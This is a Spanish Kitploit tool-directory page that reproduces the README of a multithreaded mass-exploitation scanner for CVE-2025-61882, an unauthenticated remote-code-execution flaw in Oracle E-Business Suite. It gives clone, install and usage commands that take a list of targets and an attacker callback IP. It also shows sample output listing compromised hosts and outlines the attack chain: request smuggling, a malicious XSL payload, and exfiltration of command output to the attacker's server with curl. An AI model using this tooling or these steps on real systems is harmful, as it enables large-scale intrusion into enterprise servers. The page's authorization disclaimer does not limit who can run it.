Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-61882 — Escáner multihilo para CVE-2025-61882 en Oracle E-Business Suite, que explota el contrabando de solicitudes HTTP para lograr ejecución remota de código no autenticada y validar mediante la salida de comandos. | Kitploit
Herramientas/GitHubGitHub/sachinart/cve-2025-61882
ReconocimientoEscáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubsachinart/cve-2025-61882

CVE-2025-61882

Escáner multihilo para CVE-2025-61882 en Oracle E-Business Suite, que explota el contrabando de solicitudes HTTP para lograr ejecución remota de código no autenticada y validar mediante la salida de comandos.

Ver Repositorio
117hace 10 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Escáner RCE para Oracle E-Business Suite (CVE-2025-61882)

Un escáner masivo rápido y multi-hilo para detectar CVE-2025-61882 en instalaciones de Oracle E-Business Suite. Esta vulnerabilidad crítica permite la ejecución remota de código sin autenticación.

Python Version License CVE

🎯 Características

  • Escaneo Masivo - Procesa cientos o miles de objetivos desde un archivo
  • Multi-hilo - Escaneo concurrente configurable (por defecto: 20 hilos)
  • Detección Automática - Valida RCE ejecutando el comando id y analizando la salida
  • Resultados en Tiempo Real - Los objetivos vulnerables se escriben en vuln-output.txt inmediatamente
  • Puertos Aleatorios - Usa puertos aleatorios (2000-9999) para cada objetivo y evitar conflictos
  • Salida Limpia - Seguimiento del progreso con mínimo ruido

📋 Requisitos

root@kitploit:~
pip install requests

Eso es todo. Solo Python 3.7+ y la librería requests.

🚀 Instalación

root@kitploit:~
git clone https://github.com/Sachinart/CVE-2025-61882.git
cd CVE-2025-61882
pip install -r requirements.txt

💻 Uso

Escaneo Básico

root@kitploit:~
python3 cve-2025-61882.py --targets targets.txt --lhost TU_IP_VPS

Escaneo Rápido (50 hilos)

root@kitploit:~
python3 cve-2025-61882.py --targets targets.txt --lhost TU_IP_VPS --threads 50

Escaneo Conservador (10 hilos)

root@kitploit:~
python3 cve-2025-61882.py --targets targets.txt --lhost TU_IP_VPS --threads 10

📝 Formato del Archivo de Objetivos

Crea un archivo targets.txt con una URL por línea:

root@kitploit:~
http://oracle-ebs1.example.com:8000
https://oracle-ebs2.example.com:443
http://192.168.1.100:8001
https://apps.company.com

📊 Ejemplo de Salida

root@kitploit:~
╔═══════════════════════════════════════════════════════════════╗
║   Oracle E-Business Suite RCE Scanner (CVE-2025-61882)       ║
╚═══════════════════════════════════════════════════════════════╝

[*] Cargados 1235 objetivos desde el archivo
[*] Ejecutando con 20 hilos concurrentes
[*] Los hosts vulnerables se guardarán en vuln-output.txt

[*] [1/1235] Comprobando https://target1.com:443 en el puerto 7893
[*] [2/1235] Comprobando https://target2.com:443 en el puerto 5882

[+] ¡Encontrado! 129.146.56.43 es vulnerable
[+] Salida del comando: uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)

=================================================================
[*] Escaneo finalizado en 245.67 segundos
[*] Encontrados 3 objetivo(s) vulnerable(s)
[*] Revisa vuln-output.txt para ver los resultados completos
=================================================================

[+] Objetivos vulnerables encontrados:

    129.146.56.43 → uid=54321(oracle) gid=54321(oinstall)
    192.168.1.50 → uid=1000(applmgr) gid=1000(dba)
    10.0.0.100 → uid=500(oracle) gid=500(oinstall)

📄 Archivo de Salida

Los resultados se guardan en vuln-output.txt:

root@kitploit:~
# Oracle EBS CVE-2025-61882 - Resultados del Escaneo
# Iniciado: Tue Oct 07 15:30:45 2025
# Total de objetivos: 1235
# Escáner por: Chirag Artani

129.146.56.43 | uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
192.168.1.50 | uid=1000(applmgr) gid=1000(dba) groups=1000(dba)
10.0.0.100 | uid=500(oracle) gid=500(oinstall) groups=500(oinstall)

🔍 Cómo Funciona

  1. Obtención del Token CSRF - Obtiene un token CSRF válido del objetivo
  2. Contrabando de Peticiones HTTP - Explota la vulnerabilidad de contrabando para inyectar el payload malicioso
  3. Entrega del Payload XSL - Sirve una hoja de estilo XSL maliciosa que ejecuta comandos
  4. Validación de Devolución de Llamada - El objetivo ejecuta el comando id y envía la salida de vuelta mediante curl
  5. Coincidencia de Expresiones Regulares - Valida el RCE exitoso comprobando el patrón uid=...gid=...

⚙️ Configuración

🔒 Divulgación Responsable

Esta herramienta es solo para pruebas de seguridad autorizadas. Siempre:

  • ✅ Obtén permiso por escrito antes de probar
  • ✅ Solo escanea sistemas que posees o para los que tienes autorización explícita
  • ✅ Reporta los hallazgos de manera responsable a las organizaciones afectadas
  • ✅ Sigue las prácticas de divulgación coordinada de vulnerabilidades
  • ❌ Nunca la uses en sistemas no autorizados

El acceso no autorizado a sistemas informáticos es ilegal.

🐛 Problemas Conocidos

  • Algunos objetivos pueden agotar el tiempo de espera debido al bloqueo de firewalls/IDS
  • La detección de devolución de llamada requiere que el objetivo alcance tu VPS en puertos aleatorios
  • Las advertencias de certificados SSL están suprimidas (esperado en pruebas de penetración)

🤝 Contribuciones

¿Encontraste un error? ¿Tienes una solicitud de función?

  1. Haz un fork del repositorio
  2. Crea tu rama de función (git checkout -b feature/caracteristica-increible)
  3. Haz commit de tus cambios (git commit -m 'Añadir alguna característica')
  4. Sube la rama (git push origin feature/caracteristica-increible)
  5. Abre una Pull Request

📜 Licencia

Este proyecto está licenciado bajo la Licencia MIT - consulta el archivo LICENSE para más detalles.

⚠️ Aviso Legal

Esta herramienta se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas. El autor no es responsable de ningún uso indebido o daño causado por esta herramienta. Úsala bajo tu propio riesgo.

📚 Referencias

  • Detalles de CVE-2025-61882
  • Actualización de Parches Críticos de Oracle

👨‍💻 Desarrollado por Chirag Artani

Sitio Web • Twitter • LinkedIn

Hecho con ❤️ para la comunidad de infosec

Descargar herramienta
ArgumentoRequeridoPor DefectoDescripción
--targetsSí-Ruta al archivo que contiene las URLs de los objetivos
--lhostSí-Tu IP de VPS/atacante
--threadsNo20Número de hilos concurrentes